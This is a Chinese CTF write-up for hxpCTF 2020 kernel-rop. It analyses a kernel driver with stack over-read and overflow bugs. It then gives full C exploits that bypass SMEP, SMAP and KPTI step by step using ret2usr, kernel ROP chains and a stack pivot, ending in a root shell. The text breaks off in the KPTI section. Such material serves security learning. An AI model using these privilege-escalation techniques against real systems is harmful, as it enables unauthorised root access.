逐步绕过smep smap kaslr kpti —— hxpctf2020 kernel-rop

从笔记里发现2021年写的一篇writeup,题目是hxpctf2020 kernel-rop,应该是参考某个老外的博客,逐步打开smep smap kaslr kpti来进行一个内核栈溢出漏洞的exploit练习。

参考Reference

https://lkmidas.github.io/posts/20210123-linux-kernel-pwn-part-1/
https://elixir.bootlin.com/linux/v5.9-rc6/source
Linux KASLR机制详解
Kernel address space layout randomization (KASLR)
Function Granular KASLR
stackoverflow - what is __ksymtab? in linux kernel

题目环境

hxpCTF-2020 kernel-rop

题目的qemu启动脚本:

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep,+smap \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "console=ttyS0 kaslr kpti=1 quiet panic=1"

原题中开启了 smep、smap、kaslr、kpti四种保护机制。这里修改启动脚本,将它们一个一个开启,逐步绕过去进行利用。

漏洞分析

init:创建了/dev/hackme杂项设备

1
2
3
4
5
6
7
8
int __cdecl hackme_init()
{
__int64 v0; // rdi
__int64 v1; // rsi

_fentry__(v0, v1);
return misc_register(&hackme_misc); // /dev/hackme
}

read:

栈越界读:tmp只有0x80字节(int[32]),而size最大允许到0x1000,因此可以越界读出tmp之后栈上的数据(最多0x1000-0x80字节)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
ssize_t __fastcall hackme_read(file *f, char *data, size_t size, loff_t *off)
{
unsigned __int64 size_1; // rdx
unsigned __int64 size_2; // rbx
bool v6; // zf
ssize_t result; // rax
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v9; // [rsp+80h] [rbp-20h]

_fentry__(f, data);
size_2 = size_1;
v9 = __readgsqword(0x28u);
_memcpy(hackme_buf, tmp, size_1);
if ( size_2 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, size_2);
BUG();
}
_check_object_size(hackme_buf, size_2, 1LL);
v6 = copy_to_user(data, hackme_buf, size_2) == 0;// out of bound read
result = -14LL;
if ( v6 )
return size_2;
return result;
}

write:

栈溢出写:tmp只有0x80字节(int[32]),而size最大允许到0x1000,因此可以越界覆盖tmp之后栈上的数据(最多0x1000-0x80字节)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
ssize_t __fastcall hackme_write(file *f, const char *data, size_t size, loff_t *off)
{
unsigned __int64 size_1; // rdx
ssize_t size_2; // rbx
int tmp[32]; // [rsp+0h] [rbp-A0h] BYREF
unsigned __int64 v8; // [rsp+80h] [rbp-20h]

_fentry__(f, data);
size_2 = size_1;
v8 = __readgsqword(0x28u);
if ( size_1 > 0x1000 )
{
_warn_printk("Buffer overflow detected (%d < %lu)!\n", 4096LL, size_1);
BUG();
}
_check_object_size(hackme_buf, size_1, 0LL);
if ( copy_from_user(hackme_buf, data, size_2) )
return -14LL;
_memcpy(tmp, hackme_buf, size_2); // stack overflow write
return size_2;
}

开启了栈保护:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
.text.hackme_write:0000000000000020                 call    __fentry__
.text.hackme_write:0000000000000025 push rbp
.text.hackme_write:0000000000000026 mov rbp, rsp
.text.hackme_write:0000000000000029 push r12
.text.hackme_write:000000000000002B push rbx
.text.hackme_write:000000000000002C mov rbx, size
.text.hackme_write:000000000000002F sub rsp, 88h
.text.hackme_write:0000000000000036 mov rax, gs:28h
.text.hackme_write:000000000000003F mov [rbp-18h], rax
....
.text.hackme_write:0000000000000092 mov rcx, [rbp-18h]
.text.hackme_write:0000000000000096 xor rcx, gs:28h
.text.hackme_write:000000000000009F jnz short loc_C9 ; canary校验失败分支
.text.hackme_write:00000000000000A1 add rsp, 88h
.text.hackme_write:00000000000000A8 pop rbx
.text.hackme_write:00000000000000A9 pop data
.text.hackme_write:00000000000000AB pop rbp
.text.hackme_write:00000000000000AC retn

调试

修改文件系统中的init脚本,将 /proc/kallsyms复制到根目录下,因为非root用户直接读取/proc/kallsyms时所有的符号地址都是0

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/sh

/bin/busybox --install -s

stty raw -echo

chown -R 0:0 /

mkdir -p /proc && mount -t proc none /proc
mkdir -p /dev && mount -t devtmpfs devtmpfs /dev
mkdir -p /tmp && mount -t tmpfs tmpfs /tmp

insmod /hackme.ko
chmod 666 /dev/hackme

echo 0 > /proc/sys/kernel/kptr_restrict
cp /proc/kallsyms /kallsyms
# echo 1 > /proc/sys/kernel/dmesg_restrict
# chmod 400 /proc/kallsyms

在qemu启动脚本中加-s选项,就可以从宿主机gdb中通过1234端口调试虚拟机的内核了。

文件系统解包脚本decompress.sh:

1
2
3
4
5
6
mkdir initramfs
cd initramfs
cp ../initramfs.cpio.gz .
gunzip ./initramfs.cpio.gz
cpio -idm < ./initramfs.cpio
rm initramfs.cpio

文件系统打包脚本compress.sh:

1
2
3
4
5
6
cd initramfs
find . -print0 \
| cpio --null -ov --format=newc \
| gzip -9 > initramfs.cpio.gz
mv ./initramfs.cpio.gz ../

Level1 ret2usr

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
qemu-system-x86_64 \
-m 128M \
-cpu kvm64, \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "nopti nokaslr console=ttyS0 quiet panic=1"

在启动脚本中把所有保护机制都关掉。这种情况下的利用就相当简单了。

  • exp开始时先保存此时的cs、ss、rsp、rflags,后面从内核态返回用户态时使用

  • read()溢出,泄露栈上的canary

  • write()溢出,覆盖栈上的返回地址和canary

  • 在用户空间布置commit_creds(prepare_kernel_cred(0))的内核函数调用

    由于没有开启kaslr,所以直接读kallsyms获取内核符号的地址即可:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    / $ cat ./kallsyms  | grep commit_cred
    ffffffff814c6410 T commit_creds
    ffffffff81f87d90 r __ksymtab_commit_creds
    ffffffff81fa0972 r __kstrtab_commit_creds
    ffffffff81fa4d42 r __kstrtabns_commit_creds
    / $ cat ./kallsyms | grep prepare_kernel_cred
    ffffffff814c67f0 T prepare_kernel_cred
    ffffffff81f8d4fc r __ksymtab_prepare_kernel_cred
    ffffffff81fa09b2 r __kstrtab_prepare_kernel_cred
    ffffffff81fa4d42 r __kstrtabns_prepare_kernel_cred
  • 返回用户态运行root shell

    内核态返回用户态时可以使用iretq指令,调用这条指令时的栈布局如下:

    1
    2
    3
    4
    5
    rsp ---> rip 
    cs
    rflags
    rsp
    ss

ret2usr完整exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>


int global_fd;

// Open the /dev/hackme device read-write and store the descriptor in global_fd.
// On failure a message is printed and the process terminates with exit(-1).
void open_dev(){
    global_fd = open("/dev/hackme", O_RDWR);
    if (global_fd >= 0){
        puts("[*] Opened device");
        return;
    }
    puts("[!] Failed to open device");
    exit(-1);
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// Snapshot the current user-mode CS, SS, RSP and RFLAGS into the file-scope
// variables user_cs, user_ss, user_sp and user_rflags. These values are used
// later to build the frame that iretq needs when returning from kernel mode
// to user mode.
void save_state(){
__asm__(
".intel_syntax noprefix;" // the statements below are written in Intel syntax
"mov user_cs, cs;"        // user_cs = code segment selector
"mov user_ss, ss;"        // user_ss = stack segment selector
"mov user_sp, rsp;"       // user_sp = stack pointer at this point
"pushf;"                  // push RFLAGS onto the stack ...
"pop user_rflags;"        // ... and pop it straight into user_rflags
".att_syntax;"            // switch the assembler back to AT&T syntax
);
puts("[*] Saved state");
}

// Debug helper: print the first n words of a leaked buffer, one
// "index: hex-value" pair per line.
void print_leak(unsigned long *leak, unsigned n) {
    unsigned idx = 0;
    while (idx < n) {
        printf("%u: %lx\n", idx, leak[idx]);
        idx++;
    }
}

unsigned long cookie;

// Leak the stack canary through the out-of-bounds read in hackme_read().
//
// The driver copies from its on-stack tmp buffer, and the canary sits 0x80
// bytes past the start of tmp, i.e. at index 16 when the data is viewed as
// unsigned long words. The value is stored in the global `cookie`.
//
// If read() fails or returns too few bytes to cover the canary slot, the
// process exits instead of continuing with an uninitialised value.
void leak(void){
    enum { LEAK_WORDS = 20, COOKIE_IDX = 16 };
    unsigned long buf[LEAK_WORDS] = {0};

    ssize_t r = read(global_fd, buf, sizeof(buf));
    // The read must reach at least one full word past COOKIE_IDX words.
    if (r < (ssize_t)((COOKIE_IDX + 1) * sizeof(buf[0]))) {
        printf("[!] Leak failed, read returned %zd\n", r);
        exit(-1);
    }
    cookie = buf[COOKIE_IDX];

    printf("[*] Leaked %zd bytes\n", r);
    printf("[*] Cookie: %lx\n", cookie);
}

// User-mode landing function: checks the current user id and spawns
// /bin/sh via system() when it is 0; otherwise reports the uid and exits
// with status -1.
void get_shell(void){
    puts("[*] Returned to userland");
    if (getuid() != 0){
        printf("[!] UID: %d, didn't get root\n", getuid());
        exit(-1);
    }
    printf("[*] UID: %d, got root!\n", getuid());
    system("/bin/sh");
}

unsigned long user_rip = (unsigned long)get_shell;

// Runs commit_creds(prepare_kernel_cred(0)) and then returns to user mode.
//
// The two kernel function addresses are hard-coded; they are the values
// shown by kallsyms for this kernel when booted with nokaslr. After the
// credential change, an iretq frame (SS, RSP, RFLAGS, CS, RIP, pushed in
// that order so RIP ends up on top) is built from the values captured by
// save_state() and from user_rip.
void escalate_privs(void){
__asm__(
".intel_syntax noprefix;"
"movabs rax, 0xffffffff814c67f0;" // rax = address of prepare_kernel_cred
"xor rdi, rdi;"                   // first argument = 0
"call rax; mov rdi, rax;"         // call it; the result becomes the next first argument
"movabs rax, 0xffffffff814c6410;" // rax = address of commit_creds
"call rax;"                       // commit_creds(result of prepare_kernel_cred)
"swapgs;"                         // swap the GS base before leaving kernel mode
"mov r15, user_ss;"
"push r15;"                       // iretq frame: SS
"mov r15, user_sp;"
"push r15;"                       // iretq frame: RSP
"mov r15, user_rflags;"
"push r15;"                       // iretq frame: RFLAGS
"mov r15, user_cs;"
"push r15;"                       // iretq frame: CS
"mov r15, user_rip;"
"push r15;"                       // iretq frame: RIP (top of stack)
"iretq;"                          // return to user mode at user_rip
".att_syntax;"
);
}

// Build the overflow payload and send it through write() on the device.
//
// Layout, in unsigned long words, matching the hackme_write() stack frame:
//   [0..15]  filler covering the 0x80-byte tmp buffer
//   [16]     stack canary (must equal the leaked cookie)
//   [17..19] saved rbx, r12, rbp popped by the function epilogue
//   [20]     return address
// NOTE(review): words 0..15 and everything after the return address are
// never initialised, so whatever is on the user stack is sent as filler.
void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16; // skip the 16 words that cover tmp
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = (unsigned long)escalate_privs; // ret

puts("[*] Prepared payload");
// NOTE(review): w is never inspected; control is not expected to come back here.
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

// Entry point: runs the four stages in order. The final puts() is only
// reached if overflow() returns, which is not expected.
int main() {

// Capture cs/ss/rsp/rflags for the later return to user mode.
save_state();

// Open /dev/hackme into global_fd.
open_dev();

// Read the stack canary into cookie.
leak();

// Send the overflow payload.
overflow();

puts("[!] Should never be reached");

return 0;
}

Level2 SMEP

修改run.sh,添加cpu的smep保护

1
2
3
4
5
6
7
8
9
10
11
12
#!/bin/sh
# Level 2 boot script: SMEP is the only mitigation enabled
# (no SMAP; KPTI and KASLR are disabled on the kernel command line).
# The -cpu model and its feature flags must form one comma-separated word
# with no spaces, and each continuation backslash needs a space before it.
qemu-system-x86_64 \
-m 128M \
-cpu kvm64,+smep \
-kernel vmlinuz \
-initrd initramfs.cpio.gz \
-hdb flag.txt \
-snapshot \
-nographic \
-monitor /dev/null \
-no-reboot \
-append "nopti nokaslr console=ttyS0 quiet panic=1"

SMEP(Supervisor Mode Execution Prevention),由控制寄存器CR4的第20位(bit 20)控制开启。开启后,当CPU处于内核态时,如果去执行用户空间的代码,会触发缺页异常(#PF),内核打印oops并杀掉当前进程。

在开启了smep后,再去运行ret2usr的exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
/ $ ./ret2usr
[*] Saved state
[*] Opened device
[*] Leaked 160 bytes
[*] Cookie: 717aa681e82dc400
[*] Prepared payload
[ 6.798083] unable to execute userspace code (SMEP?) (uid: 1000)
[ 6.799234] BUG: unable to handle page fault for address: 0000000000401fd9
[ 6.799547] #PF: supervisor instruction fetch in kernel mode
[ 6.799785] #PF: error_code(0x0011) - permissions violation
[ 6.800155] PGD 655c067 P4D 655c067 PUD 655d067 PMD 64f9067 PTE 2a62025
[ 6.800914] Oops: 0011 [#1] SMP NOPTI
[ 6.801413] CPU: 0 PID: 114 Comm: ret2usr Tainted: G O 5.9.0-rc6+ #10
[ 6.801709] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.13.0-1ubuntu1.1 04/01/2014
[ 6.802560] RIP: 0010:0x401fd9
[ 6.802746] Code: Bad RIP value.
[ 6.802923] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 6.803146] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 6.803392] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 6.803718] RBP: 0000000000000000 R08: 0000000000000000 R09: ffffc900001bfed8
[ 6.803952] R10: 0000000000000000 R11: ffffc900001bfed8 R12: 0000000000000000
[ 6.804173] R13: ffffc900001bfef0 R14: 00007ffddaf5a460 R15: ffff888006884000
[ 6.804518] FS: 00000000008de880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 6.804765] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 6.805029] CR2: 0000000000401fd9 CR3: 0000000006492000 CR4: 00000000001006f0
[ 6.805472] Call Trace:
[ 6.806672] ? tty_write+0x210/0x370
[ 6.806850] ? security_file_permission+0x127/0x170
[ 6.807015] ? security_file_permission+0x127/0x170
[ 6.807262] Modules linked in: hackme(O)
[ 6.807758] CR2: 0000000000401fd9
[ 6.808374] ---[ end trace fe910e97161ede8c ]---
[ 6.808619] RIP: 0010:0x401fd9
[ 6.808721] Code: Bad RIP value.
[ 6.808842] RSP: 0018:ffffc900001bfeb0 EFLAGS: 00000296
[ 6.809006] RAX: 0000000000000190 RBX: 0000000000000000 RCX: 0000000000000000
[ 6.809216] RDX: 0000000000000010 RSI: ffffffffc00025c0 RDI: ffffc900001bff88
[ 6.809419] RBP: 0000000000000000 R08: 0000000000000000 R09: ffffc900001bfed8
[ 6.809627] R10: 0000000000000000 R11: ffffc900001bfed8 R12: 0000000000000000
[ 6.809836] R13: ffffc900001bfef0 R14: 00007ffddaf5a460 R15: ffff888006884000
[ 6.810036] FS: 00000000008de880(0000) GS:ffff888007800000(0000) knlGS:0000000000000000
[ 6.810262] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 6.810424] CR2: 0000000000401fd9 CR3: 0000000006492000 CR4: 00000000001006f0
Killed

2.1 传统的smep绕过

由于smep是通过cr4寄存器来控制开启的,而这个寄存器在内核态是可以修改的,因此可以通过内核中mov cr4, rdi这样的gadget,将CR4的第20位置0将其关闭。而诸如此类的内核指令来自于一个内核函数native_write_cr4(),该函数将cr4置为参数指定的值

修改exp中的栈溢出payload,添加修改CR4的gadget:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
unsigned long pop_rdi_ret = 0xffffffff81006370;
unsigned long native_write_cr4 = 0xffffffff814443e0;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0x6f0;
payload[off++] = native_write_cr4; // native_write_cr4(0x6f0), clear the 20th bit
payload[off++] = (unsigned long)escalate_privs;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

但是这样运行后还是会触发同样的smep错误。通过在native_write_cr4下断点调试可以发现,函数一开始确实把cr4置为了参数的值,但是随后经过一系列的判断后,又重新将smep开启了:

native_write_cr4函数入口:

可以看到,一开始,确实是修改了cr4,将smep关闭,但是继续往下运行,该函数经过一些判断后,又重新将smep打开了:

而且在题目的vmlinux中也没有搜到类似于mov cr4, rdi; ret的gadget。

题目提供的内核版本是5.9.0-rc6+,查看这个函数的源码:https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/kernel/cpu/common.c#L376

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
/* These bits should not change their value after CPU init is finished. */
static const unsigned long cr4_pinned_mask =
X86_CR4_SMEP | X86_CR4_SMAP | X86_CR4_UMIP | X86_CR4_FSGSBASE;
static DEFINE_STATIC_KEY_FALSE_RO(cr_pinning);
static unsigned long cr4_pinned_bits __ro_after_init;

...

void native_write_cr4(unsigned long val)
{
unsigned long bits_changed = 0;

set_register:
asm volatile("mov %0,%%cr4": "+r" (val), "+m" (cr4_pinned_bits));

if (static_branch_likely(&cr_pinning)) {
if (unlikely((val & cr4_pinned_mask) != cr4_pinned_bits)) {
bits_changed = (val & cr4_pinned_mask) ^ cr4_pinned_bits;
val = (val & ~cr4_pinned_mask) | cr4_pinned_bits;
goto set_register;
}
/* Warn after we've corrected the changed bits. */
WARN_ONCE(bits_changed, "pinned CR4 bits changed: 0x%lx!?\n",
bits_changed);
}
}
#if IS_MODULE(CONFIG_LKDTM)
EXPORT_SYMBOL_GPL(native_write_cr4);
#endif

在dmesg中也可以看到代码中的log:

可以看到,内核似乎不允许我们在运行过程中去修改CR4中**cr4_pinned_mask**中的SMEP、SMAP位,当检测到CR4中这些需要固定的比特被更改时,就会重新将其置位

而在低版本的代码中(4.14.252为例https://elixir.bootlin.com/linux/v4.14.252/source/arch/x86/include/asm/special_insns.h#L75 ) ,则没有这样的限制,可以直接更改cr4:

1
2
3
4
static inline void native_write_cr4(unsigned long val)
{
asm volatile("mov %0,%%cr4": : "r" (val), "m" (__force_order));
}

https://patchwork.kernel.org/project/linux-hardening/patch/20190220180934.GA46255@beast/ 中可以找到补丁的说明,内核开发者已经意识到了这个函数gadget给漏洞利用中绕过smep、smap创造了便利,因此进行了上面的限制。

也可以看到,这个限制并不是严格的限制ROP,只是防止攻击者通过native_write_cr4()函数来关闭smep、smap,我个人理解,如果可以找到其他修改cr4的gadget,还是可以将它们关闭的。不过在这道题目的vmlinux中没有找到可利用的gadget,因此通过ROP关闭SMEP的传统方式在这里用不了。

2.2 完整的内核rop

这样的话,就不能把提权代码布置在用户态空间了,必须在内核ROP中完成提权代码commit_creds(prepare_kernel_cred(0))的调用。

  • ROP运行prepare_kernel_cred(0)
  • 通过gadget将rax中的返回值移进rdi寄存器,继续ROP调用commit_creds()
  • ROP 到swapgs ; ret.
  • 堆栈设置为RIP|CS|RFLAGS|SP|SS,最后ROP到iretq

exp:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
// gcc ret2usr.c -fPIE -static -o ret2usr

#define _GNU_SOURCE
#include <stdio.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/mman.h>
#include <signal.h>
#include <sys/syscall.h>
#include <sys/ioctl.h>
#include <linux/userfaultfd.h>
#include <sys/wait.h>
#include <poll.h>
#include <unistd.h>
#include <stdlib.h>


int global_fd;

// 打开 /dev/hackme 设备
void open_dev(){
global_fd = open("/dev/hackme", O_RDWR);
if (global_fd < 0){
puts("[!] Failed to open device");
exit(-1);
} else {
puts("[*] Opened device");
}
}

unsigned long user_cs, user_ss, user_rflags, user_sp;

// 将后面iretq时需要恢复的寄存器保存到本地变量中
void save_state(){
__asm__(
".intel_syntax noprefix;"
"mov user_cs, cs;"
"mov user_ss, ss;"
"mov user_sp, rsp;"
"pushf;"
"pop user_rflags;"
".att_syntax;"
);
puts("[*] Saved state");
}

void print_leak(unsigned long *leak, unsigned n) {
for (unsigned i = 0; i < n; ++i) {
printf("%u: %lx\n", i, leak[i]);
}
}

unsigned long cookie;

void leak(void){
unsigned n = 20;
unsigned long leak[n];
ssize_t r = read(global_fd, leak, sizeof(leak));
cookie = leak[16]; // cookie与tmp偏移0x80

printf("[*] Leaked %zd bytes\n", r);
//print_leak(leak, n);
printf("[*] Cookie: %lx\n", cookie);
}

// 判断当前用户id后运行system("/bin/sh")
void get_shell(void){
puts("[*] Returned to userland");
if (getuid() == 0){
printf("[*] UID: %d, got root!\n", getuid());
system("/bin/sh");
} else {
printf("[!] UID: %d, didn't get root\n", getuid());
exit(-1);
}
}

unsigned long user_rip = (unsigned long)get_shell; // 返回用户态后起shell

unsigned long pop_rdi_ret = 0xffffffff81006370; // pop rdi; ret;
unsigned long native_write_cr4 = 0xffffffff814443e0; // 新版本不能关闭smep smap
unsigned long prepare_kernel_cred = 0xffffffff814c67f0;
unsigned long commit_creds = 0xffffffff814c6410;
unsigned long push_rax_ret = 0xffffffff81006070; // push rax; ret; rop中不能用,相当于rax作为返回地址了
unsigned long mov_rdi_rax = 0xffffffff816bf203; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
unsigned long swapgs_pop1_ret = 0xffffffff8100a55f; // swapgs; pop rbp; ret;
unsigned long iretq = 0xffffffff814381cb; // iretq; pop rbp; ret;

void overflow(void){
unsigned n = 50;
unsigned long payload[n];
unsigned off = 16;
payload[off++] = cookie;
payload[off++] = 0x0; // rbx
payload[off++] = 0x0; // r12
payload[off++] = 0x0; // rbp
payload[off++] = pop_rdi_ret; // return address
payload[off++] = 0;
payload[off++] = prepare_kernel_cred;
payload[off++] = mov_rdi_rax; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
payload[off++] = 0;
payload[off++] = commit_creds;
payload[off++] = swapgs_pop1_ret;
payload[off++] = 0;
payload[off++] = iretq;
payload[off++] = user_rip;
payload[off++] = user_cs;
payload[off++] = user_rflags;
payload[off++] = user_sp;
payload[off++] = user_ss;

puts("[*] Prepared payload");
ssize_t w = write(global_fd, payload, sizeof(payload));

puts("[!] Should never be reached");
}

int main() {

save_state();

open_dev();

leak();

overflow();

puts("[!] Should never be reached");

return 0;
}

2.3 栈迁移的ROP

上一小节中,在内核栈上进行了一个完整的ROP,显然这种ROP是需要攻击者能够控制较大范围的栈空间,而很多情况下,我们可能只能控制返回地址前后的有限长度,这时候就可以尝试进行栈迁移,将栈迁移到能控制的地方去,在SMAP没有开启的情况下,可以将栈迁移到EXP的用户态空间中,再布置ROP就不受payload长度的限制了。

在vmlinux中找到这样一条迁移栈的gadget:

1
2
0xffffffff8196f56a: mov esp, 0x5b000000; pop r12; pop rbp; ret;

先把0x5b000000这个地址mmap出来,然后在这上面布置ROP。需要注意的是,mmap的时候要从0x5b000000前面的一个页开始申请,因为在随后调用内核函数时,在函数中会抬升栈,而栈是向低地址扩展的。另外,需要在0x5b000000-0x1000处赋一个值,因为后面布置栈空间是在0x5b000000这个页做的,而用户态申请内存是有延迟分配的策略,如果不给0x5b000000-0x1000赋值,后面运行到内核函数中开辟栈时,会由于0x5b000000-0x1000这个内存页还没分配,导致一个double fault(exception处理过程中的exception)。

0x5b000000

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
// Stack-pivot variant of overflow().
//
// The on-stack payload only overwrites the canary, the three saved
// registers and the return address; the return address points at a gadget
// that sets esp to 0x5b000000. The rest of the chain lives in a user-space
// mapping at that address.
//
// Two pages are mapped starting at 0x5b000000 - 0x1000:
//   - the upper page (starting at 0x5b000000) holds the chain;
//   - the lower page gives room for the stack to grow downwards once
//     kernel functions are called, and is written once so that it is
//     actually backed by memory before it is used.
//
// Exits with status -1 if the mapping cannot be created.
void overflow(void){
    unsigned n = 50;
    unsigned long payload[n];
    unsigned off1 = 16; // skip the 16 words that cover tmp

    unsigned long *fake_stack = mmap((void *)(0x5b000000UL - 0x1000UL), 0x2000, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED, -1, 0);
    if (fake_stack == MAP_FAILED){
        puts("[!] Failed to map fake stack");
        exit(-1);
    }

    payload[off1++] = cookie;
    payload[off1++] = 0x0; // rbx
    payload[off1++] = 0x0; // r12
    payload[off1++] = 0x0; // rbp
    payload[off1++] = 0xffffffff8196f56a; // mov esp, 0x5b000000; pop r12; pop rbp; ret;

    unsigned off2 = 0x1000 / 8; // word index of 0x5b000000 inside the mapping
    fake_stack[0] = 0xdead; // put something in the first page to prevent fault
    fake_stack[off2++] = 0x0; // dummy r12
    fake_stack[off2++] = 0x0; // dummy rbp
    fake_stack[off2++] = pop_rdi_ret; // return address
    fake_stack[off2++] = 0;
    fake_stack[off2++] = prepare_kernel_cred;
    fake_stack[off2++] = mov_rdi_rax; // mov rdi, rax; mov qword ptr [rsi + 0x140], rdi; pop rbp; ret;
    fake_stack[off2++] = 0;
    fake_stack[off2++] = commit_creds;
    fake_stack[off2++] = swapgs_pop1_ret;
    fake_stack[off2++] = 0;
    fake_stack[off2++] = iretq;
    fake_stack[off2++] = user_rip;
    fake_stack[off2++] = user_cs;
    fake_stack[off2++] = user_rflags;
    fake_stack[off2++] = user_sp;
    fake_stack[off2++] = user_ss;

    puts("[*] Prepared payload");
    ssize_t w = write(global_fd, payload, sizeof(payload));
    (void)w; // control is not expected to come back here

    puts("[!] Should never be reached");
}

Level3 KPTI

3.1 KPTI 内核页表隔离

https://ctf-wiki.org/pwn/linux/kernel-mode/defense/isolation/user-kernel/kpti/
https://zhuanlan.zhihu.com/p/137277724

KPTI,即Kernel Page Table Isolation内核页表隔离技术。开启了KPTI,用户空间和内核空间将使用隔离的两份页表,而不是使用同时包含用户和内核空间的一份页表。是用来解决由Intel x86 cpu漏洞导致的页表泄露问题的。

每个进程都有一套指向进程自身的页表,由CR3寄存器指向。

早期的Linux内核,每当执行用户空间代码(应用程序)时,Linux会在其进程页表中保留整个内核内存的映射(内核地址空间和用户地址空间共用一个页全局目录表PGD),并保护其访问。这样做的优点是当应用程序向内核发送系统调用或收到中断时,内核页表始终存在,可以避免绝大多数上下文切换相关的开销(TLB刷新、页表交换等)。

KPTI中每个进程有两套页表——内核态页表与用户态页表(两个地址空间)。内核态页表包含了用户空间和内核空间的地址映射(不过用户空间受SMAP和SMEP保护)。用户态页表只包含用户空间和一小部分内核空间的映射,这是由于涉及到上下文切换,所以在用户态页表中必须包含部分内核地址,用来建立中断入口、出口的映射。

当中断发生,从用户态陷入内核态时,就涉及到切换CR3寄存器,从用户态地址空间切换到内核态的地址空间。中断上半部的要求是尽可能的快,从而切换CR3这个操作也要求尽可能的快。为了达到这个目的,KPTI中将内核空间的PGD和用户空间的PGD放置在一个连续的8KB内存空间中(内核态在低位,用户态在高位)。这段空间必须是8K对齐的,这样将CR3的切换操作转换为将CR3值的第13位(由低到高)的置位或清零操作,提高了CR3切换的速度。

开启KPTI后,再想提权就比较有局限性,比如我们常用的直接ret2usr方式在KPTI下将成为过去时。

题目版本的内核系统调用入口源码:https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/entry/entry_64.S#L95

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
SYM_CODE_START(entry_SYSCALL_64)
UNWIND_HINT_EMPTY

swapgs
/* tss.sp2 is scratch space. */
movq %rsp, PER_CPU_VAR(cpu_tss_rw + TSS_sp2)
SWITCH_TO_KERNEL_CR3 scratch_reg=%rsp
...
...
...
SWITCH_TO_USER_CR3_STACK scratch_reg=%rdi

popq %rdi
popq %rsp
USERGS_SYSRET64
SYM_CODE_END(entry_SYSCALL_64)

可以看到,在入口和结束的时候,分别运行了SWITCH_TO_KERNEL_CR3和SWITCH_TO_USER_CR3_STACK宏,来进行CR3寄存器的切换。

https://elixir.bootlin.com/linux/v5.9-rc6/source/arch/x86/entry/entry_32.S#L165

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
